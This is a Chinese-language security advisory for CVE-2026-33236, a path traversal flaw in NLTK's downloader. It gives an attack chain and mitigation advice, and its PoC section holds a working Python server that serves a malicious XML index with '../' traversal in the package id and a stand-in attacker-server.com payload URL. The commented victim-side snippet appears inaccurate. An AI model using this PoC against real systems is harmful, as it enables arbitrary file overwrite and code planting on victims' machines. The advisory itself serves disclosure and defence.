CVE-2026-33236 CVSS 8.1 高危

NLTK路径遍历漏洞CVE-2026-33236

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33236

漏洞类型

路径遍历

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

NLTK (Natural Language Toolkit)

漏洞概述

NLTK（自然语言工具包）在3.9.3及之前版本中存在路径遍历漏洞。其下载器在处理远程XML索引文件时，未对`subdir`和`id`属性进行严格校验。攻击者可控制远程XML索引服务器，提供包含路径遍历序列（如`../`）的恶意值。成功利用该漏洞可导致受害者系统上发生任意目录创建、任意文件创建及文件覆盖，存在较高的安全风险。

技术细节

该漏洞源于NLTK下载器在解析远程服务器提供的XML索引文件时，未能正确过滤用户可控的路径参数。具体而言，当NLTK客户端配置为从恶意服务器获取数据包索引时，攻击者可操纵服务器返回特制的XML响应。在该响应中，`subdir`和`id`字段被注入了路径遍历字符（如`../`）。由于客户端未进行安全校验，NLTK会将下载的文件写入操作重定向到预期的数据目录之外。虽然该攻击需要用户交互（如触发下载命令），且攻击复杂度低，攻击者可利用此漏洞覆盖关键配置文件或写入恶意代码，对系统完整性和可用性造成严重影响。

攻击链分析

STEP 1

步骤1

攻击者搭建恶意的XML索引服务器，并准备包含路径遍历 payload 的特制XML文件。

STEP 2

步骤2

攻击者诱导受害者或受害者环境配置NLTK下载器，使其指向攻击者控制的恶意服务器地址。

STEP 3

步骤3

受害者执行NLTK下载操作（用户交互UI:R），向恶意服务器请求XML索引。

STEP 4

步骤4

NLTK客户端解析恶意XML，由于未过滤`../`，将文件写入操作重定向到系统任意目录（如/etc/或/tmp/）。

STEP 5

步骤5

攻击者利用任意文件写入能力覆盖系统关键文件或写入恶意代码，实现进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Malicious XML Index Server Example (PoC Concept)
# This XML structure demonstrates how to inject path traversal.

import http.server
import socketserver
import xml.etree.ElementTree as ET

PORT = 8000

# Malicious XML payload containing path traversal
MALICIOUS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<nltk_data>
    <packages>
        <package id="../../../../tmp/malicious_payload.txt" subdir="corpora">
            <url>http://attacker-server.com/payload.txt</url>
            <checksum type="sha256">dummy_checksum</checksum>
        </package>
    </packages>
</nltk_data>
"""

class MaliciousHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/xml')
        self.end_headers()
        self.wfile.write(MALICIOUS_XML.encode('utf-8'))
        print("[+] Sent malicious XML index to victim.")

with socketserver.TCPServer(("", PORT), MaliciousHandler) as httpd:
    print(f"[+] Malicious server running at port {PORT}")
    print("[+] Configure NLTK to use this server as an index and trigger download.")
    httpd.serve_forever()

# Victim Side (Conceptual)
# import nltk
# nltk.set_proxy('http://127.0.0.1:8000/index.xml')
# nltk.download('malicious_payload') # Triggers the traversal

影响范围

NLTK <= 3.9.3

防御指南

临时缓解措施

建议受影响用户尽快升级到修复版本。若无法立即升级，应严格限制NLTK下载器仅连接可信的内网或官方数据源，并在沙箱环境中运行，防止文件覆盖攻击波及宿主机系统关键路径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表